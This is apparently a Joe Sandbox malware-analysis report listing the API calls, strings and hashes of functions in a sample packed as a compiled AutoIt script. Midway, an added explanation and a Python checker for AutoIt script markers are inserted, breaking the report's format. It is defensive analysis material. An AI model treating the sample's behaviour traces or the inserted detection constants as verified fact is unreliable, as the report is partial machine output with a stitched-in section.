                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                    • String ID: *.*
                                                                    • API String ID: 34673085-438819550
                                                                    • Opcode ID: aaa607cdd6a3717cc7426503e0ab6a965f6cbd08be4f4d7ebc7084a44048391b
                                                                    • Instruction ID: 4cd3e1ce731726fc284a20d631b7b28bb43f820024042983d295488b20e9c90c
                                                                    • Opcode Fuzzy Hash: aaa607cdd6a3717cc7426503e0ab6a965f6cbd08be4f4d7ebc7084a44048391b
                                                                    • Instruction Fuzzy Hash: EC8171715042419FCB24EF65C844AAAB7F4FF89310F18C82EF99EC7251EA30DA85DB52
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C9C1FC
                                                                    • GetFocus.USER32 ref: 00C9C20C
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00C9C217
                                                                    • _memset.LIBCMT ref: 00C9C342
                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C9C36D
                                                                    • GetMenuItemCount.USER32(?), ref: 00C9C38D
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00C9C3A0
                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C9C3D4
                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C9C41C
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C9C454
                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C9C489
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1296962147-4108050209
                                                                    • Opcode ID: c49d64c006dadea638bc4c0400bbb19674ae61982fd652974620fd63daed07be
                                                                    • Instruction ID: e9a891c013dd776863cab7bf6421db9ae9c2bee58e07fb96fced2677e1936959
                                                                    • Opcode Fuzzy Hash: c49d64c006dadea638bc4c0400bbb19674ae61982fd652974620fd63daed07be
                                                                    • Instruction Fuzzy Hash: 35817D716083019FDB10CF14C9D8ABBBBE8FB88714F10492EF9A5972A1D770DA05DB62
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00C8738F
                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C8739B
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00C873A7
                                                                    • SelectObject.GDI32(00000000,?), ref: 00C873B4
                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C87408
                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C87444
                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C87468
                                                                    • SelectObject.GDI32(00000006,?), ref: 00C87470
                                                                    • DeleteObject.GDI32(?), ref: 00C87479
                                                                    • DeleteDC.GDI32(00000006), ref: 00C87480
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00C8748B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                    • String ID: (
                                                                    • API String ID: 2598888154-3887548279
                                                                    • Opcode ID: 13f324dcf8db9412cf71ba81a57cc96c2ee2f0f8207d66cdbeafebbf0cc9123a
                                                                    • Instruction ID: 39790185634f21678cd90efcb1246fc586006dd4e7bee62eaa02bed45675a5ba
                                                                    • Opcode Fuzzy Hash: 13f324dcf8db9412cf71ba81a57cc96c2ee2f0f8207d66cdbeafebbf0cc9123a
                                                                    • Instruction Fuzzy Hash: A1513775904309EFCB14DFA9CC89FAEBBB9EF48310F24852EF95997220D731A9418B54
                                                                    APIs
                                                                      • Part of subcall function 00C30957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C16B0C,?,00008000), ref: 00C30973
                                                                      • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C16BAD
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C16CFA
                                                                      • Part of subcall function 00C1586D: _wcscpy.LIBCMT ref: 00C158A5
                                                                      • Part of subcall function 00C3363D: _iswctype.LIBCMT ref: 00C33645
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                    • API String ID: 537147316-1018226102
                                                                    • Opcode ID: 8bf5cc269ad9ad2aa86cb9768a72bc298065be02cfa6a549b956dddbf34f361c
                                                                    • Instruction ID: 8e03579baae72e751186d7be0b9030478015f9d9a5853ef44a953ca8b163d892
                                                                    • Opcode Fuzzy Hash: 8bf5cc269ad9ad2aa86cb9768a72bc298065be02cfa6a549b956dddbf34f361c
                                                                    • Instruction Fuzzy Hash: 79029D31108340DFC724EF24C891AAFBBE5BF96314F14491DF49A972A1DB30DA89EB52
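The function above is the AutoIt3 script loader: the strings ">>>AUTOIT SCRIPT<<<", "AU3!" and "EA06" it references belong to the interpreter stub, which is why the report flags the sample as a compiled AutoIt script. A quick way to confirm that verdict on the file itself, independent of the sandbox, is to look for the compiled-script resource the stub appends: a 16-byte AutoIt3 header GUID immediately followed by the "AU3!EA06" tag. The checker below is an added example for this report, not Joe Sandbox output and not AutoIt's own code; the byte blobs it scans are constructed inline so it runs offline, and it can also be pointed at a real file with python3 au3check.py sample.exe.

```python
"""Detect the markers of a compiled AutoIt3 script in a binary blob.

Added example for this report (not Joe Sandbox or AutoIt code).
"""
import sys

# Publicly known AutoIt3 compiled-script header: GUID, then the "AU3!EA06" tag.
AU3_HEADER_GUID = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")
AU3_TAG = b"AU3!EA06"

# Runtime banner seen in the report's String ID; the interpreter stores it as
# a wide string, so both encodings are searched.
BANNER_ASCII = b">>>AUTOIT SCRIPT<<<"
BANNER_UTF16 = BANNER_ASCII.decode().encode("utf-16-le")


def find_autoit_markers(data: bytes) -> dict:
    """Return the first offset of each marker (None when absent) plus a
    header_contiguous flag that is True only when the GUID is directly
    followed by the AU3!EA06 tag, as in a genuine compiled script."""
    def first(needle: bytes):
        pos = data.find(needle)
        return pos if pos >= 0 else None

    hits = {
        "header_guid": first(AU3_HEADER_GUID),
        "au3_tag": first(AU3_TAG),
        "banner_ascii": first(BANNER_ASCII),
        "banner_utf16": first(BANNER_UTF16),
    }
    guid, tag = hits["header_guid"], hits["au3_tag"]
    hits["header_contiguous"] = guid is not None and tag == guid + len(AU3_HEADER_GUID)
    return hits


def is_compiled_autoit(data: bytes) -> bool:
    """Strong evidence only: the banner alone merely says 'AutoIt interpreter';
    the contiguous GUID + tag pair says 'a script is embedded'."""
    return find_autoit_markers(data)["header_contiguous"]


# Constructed test blobs (not the report's sample): a fake PE-like prefix,
# the UTF-16 banner, then an appended AutoIt3 script header.
SAMPLE_BLOB = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 32
    + BANNER_UTF16 + b"\x00" * 16
    + AU3_HEADER_GUID + AU3_TAG + b"\x01\x02\x03\x04"
)
CLEAN_BLOB = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 200


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for name, value in find_autoit_markers(blob).items():
        print(f"{name:18} {value}")
    print("compiled AutoIt3 script:", is_compiled_autoit(blob))
```

The distinction the code draws matters when triaging: every AutoIt-compiled executable carries the interpreter banner, so the banner only tells you which runtime packed the sample, while the GUID + tag pair marks the embedded script you would want to extract and decompile next.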
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C72D50
                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C72DDD
                                                                    • GetMenuItemCount.USER32(00CD5890), ref: 00C72E66
                                                                    • DeleteMenu.USER32(00CD5890,00000005,00000000,000000F5,?,?), ref: 00C72EF6
                                                                    • DeleteMenu.USER32(00CD5890,00000004,00000000), ref: 00C72EFE
                                                                    • DeleteMenu.USER32(00CD5890,00000006,00000000), ref: 00C72F06
                                                                    • DeleteMenu.USER32(00CD5890,00000003,00000000), ref: 00C72F0E
                                                                    • GetMenuItemCount.USER32(00CD5890), ref: 00C72F16
                                                                    • SetMenuItemInfoW.USER32(00CD5890,00000004,00000000,00000030), ref: 00C72F4C
                                                                    • GetCursorPos.USER32(?), ref: 00C72F56
                                                                    • SetForegroundWindow.USER32(00000000), ref: 00C72F5F
                                                                    • TrackPopupMenuEx.USER32(00CD5890,00000000,?,00000000,00000000,00000000), ref: 00C72F72
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C72F7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 3993528054-0
                                                                    • Opcode ID: 65381c4ccba23341be23c5a06cc134d952bc476d79eb7db99935d76efaa9b6d6
                                                                    • Instruction ID: bee0439f3b1fffa3585930cbbcf2ad905746837485c977a7d591f47919040f98
                                                                    • Opcode Fuzzy Hash: 65381c4ccba23341be23c5a06cc134d952bc476d79eb7db99935d76efaa9b6d6
                                                                    • Instruction Fuzzy Hash: 8E71D470600215BFEB318F55DC89FAABF64FF04764F10822AF629A61E1C7715D60DBA0
                                                                    APIs
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    • _memset.LIBCMT ref: 00C6786B
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C678A0
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C678BC
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C678D8
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C67902
                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C6792A
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C67935
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C6793A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 1411258926-22481851
                                                                    • Opcode ID: 60d53afa4147e525b8d4755eea43fce1ceb1ab5fc9a1dadf2bd52ddc738eb7d7
                                                                    • Instruction ID: 091493d106d7d212e67a6f3d32bfdeea64da81a29cba2ef9dd5bc7abcdaa7165
                                                                    • Opcode Fuzzy Hash: 60d53afa4147e525b8d4755eea43fce1ceb1ab5fc9a1dadf2bd52ddc738eb7d7
                                                                    • Instruction Fuzzy Hash: DF41087281422DABCF21EBA4DC95EEDB7B8FF04354F044629F915A31A1EA309E45DB90
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 3964851224-909552448
                                                                    • Opcode ID: ab99bd6af9eb8e8de71e1cdcf6b37fce688bdf6ecd52f0a51cf60cab22b964ee
                                                                    • Instruction ID: 7a90989bbf9678227b3376d1f1bb2069fae4d57e3da9b135052b8757ba47884e
                                                                    • Opcode Fuzzy Hash: ab99bd6af9eb8e8de71e1cdcf6b37fce688bdf6ecd52f0a51cf60cab22b964ee
                                                                    • Instruction Fuzzy Hash: 7941497211024A8FCF14EF50E869AEF3764FF11340F240458FC665B292DB319E5AEBA0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C4E2A0,00000010,?,Bad directive syntax error,00C9F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C6F7C2
                                                                    • LoadStringW.USER32(00000000,?,00C4E2A0,00000010), ref: 00C6F7C9
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • _wprintf.LIBCMT ref: 00C6F7FC
                                                                    • __swprintf.LIBCMT ref: 00C6F81E
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C6F88D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 1506413516-4153970271
                                                                    • Opcode ID: e3737f29621f02176610b3fb95bd8451250ae47effe85acc9a27fcf9ff8bf8ee
                                                                    • Instruction ID: 2c624883681fa162e9e781e3c11593e19e04a66c20876bfb666a33fc2b5315a8
                                                                    • Opcode Fuzzy Hash: e3737f29621f02176610b3fb95bd8451250ae47effe85acc9a27fcf9ff8bf8ee
                                                                    • Instruction Fuzzy Hash: 05219E3290421EEFCF11EF90CC5AFEE7778BF19300F04086AF515660A2EA319669EB50
                                                                    APIs
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                      • Part of subcall function 00C17924: _memmove.LIBCMT ref: 00C179AD
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C75330
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C75346
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C75357
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C75369
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C7537A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_memmove
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 2279737902-1007645807
                                                                    • Opcode ID: 1267b417b9cbe6784df8350da831cff1f61e939f1403a3897074a712760f9781
                                                                    • Instruction ID: 98c0c376f702c8d27c6fb731aa66888bbba5f710dc8d9b317da976b6c3af148a
                                                                    • Opcode Fuzzy Hash: 1267b417b9cbe6784df8350da831cff1f61e939f1403a3897074a712760f9781
                                                                    • Instruction Fuzzy Hash: AF119431A5012979D720B771CC5AEFF7B7CEBD2B90F00092DB415A20E1EEA04D49D6B0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 208665112-3771769585
                                                                    • Opcode ID: 2d11cd0959c16bba0bc2ae805d1578724879e339384da3c35cc315ecba3602cd
                                                                    • Instruction ID: df259518ed2084f8b985dcd7bff1108c203c8a74bf21be026e02a9f46e23f96f
                                                                    • Opcode Fuzzy Hash: 2d11cd0959c16bba0bc2ae805d1578724879e339384da3c35cc315ecba3602cd
                                                                    • Instruction Fuzzy Hash: 9011E731600114AFCB28AB709C4AFDE77BCEF02711F0441BAF449D60A1EF719E82DA50
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 00C74F7A
                                                                      • Part of subcall function 00C3049F: timeGetTime.WINMM(?,75C0B400,00C20E7B), ref: 00C304A3
                                                                    • Sleep.KERNEL32(0000000A), ref: 00C74FA6
                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00C74FCA
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C74FEC
                                                                    • SetActiveWindow.USER32 ref: 00C7500B
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C75019
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C75038
                                                                    • Sleep.KERNEL32(000000FA), ref: 00C75043
                                                                    • IsWindow.USER32 ref: 00C7504F
                                                                    • EndDialog.USER32(00000000), ref: 00C75060
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: 3604de9101bce16476e267fbb483d5a0530b71354f1a8519bfa689fab86ab46d
                                                                    • Instruction ID: ca30698cce84be88c078b28d7a31f864a41dbbe7aefd1a23a9d131181456fbb6
                                                                    • Opcode Fuzzy Hash: 3604de9101bce16476e267fbb483d5a0530b71354f1a8519bfa689fab86ab46d
                                                                    • Instruction Fuzzy Hash: EA21AC74606605AFE7105F70FC8CB2E3B69EB08745F14902BF119C21B9EBB58E91DB62
                                                                    APIs
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • CoInitialize.OLE32(00000000), ref: 00C7D5EA
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C7D67D
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00C7D691
                                                                    • CoCreateInstance.OLE32(00CA2D7C,00000000,00000001,00CC8C1C,?), ref: 00C7D6DD
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C7D74C
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00C7D7A4
                                                                    • _memset.LIBCMT ref: 00C7D7E1
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00C7D81D
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C7D840
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00C7D847
                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C7D87E
                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 00C7D880
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                    • String ID:
                                                                    • API String ID: 1246142700-0
                                                                    • Opcode ID: 087f039d2aa9ae44397d1fb8f8324725d2e33782fb41e250971553a84c0439c3
                                                                    • Instruction ID: 44c2840727646ebb5c39b77c4ca37eb4a68ac18212ed2e552abf3352f658aac1
                                                                    • Opcode Fuzzy Hash: 087f039d2aa9ae44397d1fb8f8324725d2e33782fb41e250971553a84c0439c3
                                                                    • Instruction Fuzzy Hash: E3B10F75A00109AFDB04DF64C888EAEBBB9FF49314F148469F90AEB251DB30EE45DB50
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00C6C283
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00C6C295
                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C6C2F3
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00C6C2FE
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00C6C310
                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C6C364
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00C6C372
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00C6C383
                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C6C3C6
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00C6C3D4
